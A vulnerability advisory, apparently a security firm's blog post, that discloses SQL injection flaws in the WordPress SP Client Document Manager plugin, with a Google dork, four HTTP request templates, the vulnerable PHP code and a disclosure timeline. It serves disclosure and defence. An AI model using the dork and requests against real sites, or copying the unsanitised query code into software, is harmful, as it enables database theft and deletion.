ITAS Team discovered Multiple SQL Injection in SP Client Document Manager Plugin

ITAS Team discovered Multiple SQL Injection in SP Client Document Manager Plugin

SP Client Document Manager plugin (https://wordpress.org/plugins/sp-client-document-manager/) contains some flaws that may allow carrying out SQL injection attacks. The issue is due to the some scripts not properly sanitizing user-supplied input-data. This may allow a remote attacker to inject or manipulate SQL queries in the back-end database, allowing for the manipulation or disclosure of arbitrary data.

Vulnerability information:
– Vulnerability : SQL injection
– Vendor : http://smartypantsplugins.com
– Link download : https://wordpress.org/plugins/sp-client-document-manager/
– Affected version: version 2.4.1 and previous version 2.4.1
– Google dork: inurl:wp-content/plugins/sp-client-document-manager
– Discovered by: Dang Quoc Thai – thai.q.dang@itas.vn và ITAS Team

– Link 1:
POST /wordpress/wp-content/plugins/sp-client-document-manager/ajax.php?functi
on=email-vendor HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Referer: http://target.org/wordpress/?page_id=16
Cookie: wordpress_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%7CxKIQf181
2x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7Cc493b6c21a4a1916e2bc6076600939af52
76b6feb09d06ecc043c37bd92a0748; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_cbbb3ecca6306be6e41d05424d417f7b=test1%7C1414550777%
7CxKIQf1812x9lfyhuFgNQQhmDtojDdEnDTfLisVHwnJ6%7C7995fe13b1bbe0761cb05258
e4e13b20b27cc9cedf3bc337440672353309e8a3; bp-activity-oldestpage=1
Connection: keep-alive
Content-Length: 33
Content-Type: application/x-www-form-urlencoded; charset=UTF-8

vendor_email[]=

Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1516 -> 1530)
function email_vendor()
{
global $wpdb, $current_user;
if (count($_POST[‘vendor_email’]) == 0) {
echo ‘

‘ . __(“Please select at least one file!”, “sp-cdm”) . ‘

‘;
} else {
$files = implode(“,”, $_POST[‘vendor_email’]);
echo “SELECT * FROM ” . $wpdb->prefix . “sp_cu WHERE id IN (” . $files . “)”.”n”;
$r = $wpdb->get_results(“SELECT * FROM ” . $wpdb->prefix . “sp_cu WHERE id IN (” . $files . “)”, ARRAY_A);

– Link 2:
GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=downloa
d-project&id= HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive

Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1462 -> 1479)

function download_project()
{
global $wpdb, $current_user;
$user_ID = $_GET[‘id’];
$r = $wpdb->get_results(“SELECT * FROM ” . $wpdb->prefix . “sp_cu where pid = $user_ID order by date desc”, ARRAY_A);
$r_project = $wpdb->get_results(“SELECT * FROM ” . $wpdb->prefix . “sp_cu_project where id = $user_ID “, ARRAY_A);
$return_file = “” . preg_replace(‘/[^wd_ -]/si’, ”, stripslashes($r_project[0][‘name’])) . “.zip”;
$zip = new Zip();
$dir = ” . SP_CDM_UPLOADS_DIR . ” . $r_project[0][‘uid’] . ‘/’;
$path = ” . SP_CDM_UPLOADS_DIR_URL . ” . $r_project[0][‘uid’] . ‘/’;
//@unlink($dir.$return_file);
for ($i = 0; $i < count($r); $i++) { $zip->addFile(file_get_contents($dir . $r[$i][‘file’]), $r[$i][‘file’], filectime($dir . $r[$i][‘file’]));
}
$zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves.
$zip->setZipFile($dir . $return_file);
header(“Location: ” . $path . $return_file . “”);
}

– Link 3:

GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=downloa
d-archive&id= HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1480 -> 1496)

function download_archive()
{
global $wpdb, $current_user;
$user_ID = $_GET[‘id’];
$dir = ” . SP_CDM_UPLOADS_DIR . ” . $user_ID . ‘/’;
$path = ” . SP_CDM_UPLOADS_DIR_URL . ” . $user_ID . ‘/’;
$return_file = “Account.zip”;
$zip = new Zip();
$r = $wpdb->get_results(“SELECT * FROM ” . $wpdb->prefix . “sp_cu where uid = $user_ID order by date desc”, ARRAY_A);
//@unlink($dir.$return_file);
for ($i = 0; $i < count($r); $i++) { $zip->addFile(file_get_contents($dir . $r[$i][‘file’]), $r[$i][‘file’], filectime($dir . $r[$i][‘file’]));
}
$zip->finalize(); // as we are not using getZipData or getZipFile, we need to call finalize ourselves.
$zip->setZipFile($dir . $return_file);
header(“Location: ” . $path . $return_file . “”);
}

– Link 4:

GET /wp-content/plugins/sp-client-document-manager/ajax.php?function=remove-
category&id= HTTP/1.1
Host: target.org
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:33.0) Gecko/20100101 Firefox/33.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: PHPSESSID=4f7eca4e8ea50fadba7209e47494f29c
Connection: keep-alive
Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 1480 -> 1496)

Vulnerable file:/wp-content/plugins/sp-client-document-manager/classes/ajax.php
Vulnerable code: (Line: 368 -> 372)

function remove_cat()
{
global $wpdb, $current_user;
$wpdb->query(“DELETE FROM ” . $wpdb->prefix . “sp_cu_project WHERE id = ” . $_REQUEST[‘id’] . ” “);
$wpdb->query(“DELETE FROM ” . $wpdb->prefix . “sp_cu WHERE pid = ” . $_REQUEST[‘id’] . ” “);
}

Information disclosure:
– 10/30/2014: Notify to vendor – vendor does not response
– 11/05/2014: Notify to vendor – Vendor blocks IPs from Vietnam
– 11/08/2014: Notify to vendor – vendor does not response
– 11/20/2014: Public information

Reference:
http://www.securityfocus.com/archive/1/534041
http://www.exploit-db.com/exploits/35313/
http://www.cvedetails.com/cve/CVE-2014-9178/
http://xforce.iss.net/xforce/xfdb/98897
http://packetstormsecurity.com/files/129212/WordPress-SP-Client-Document-Manager-2.4.1-SQL-Injection.html

Demonstration video

/ Blog / Tags: , ,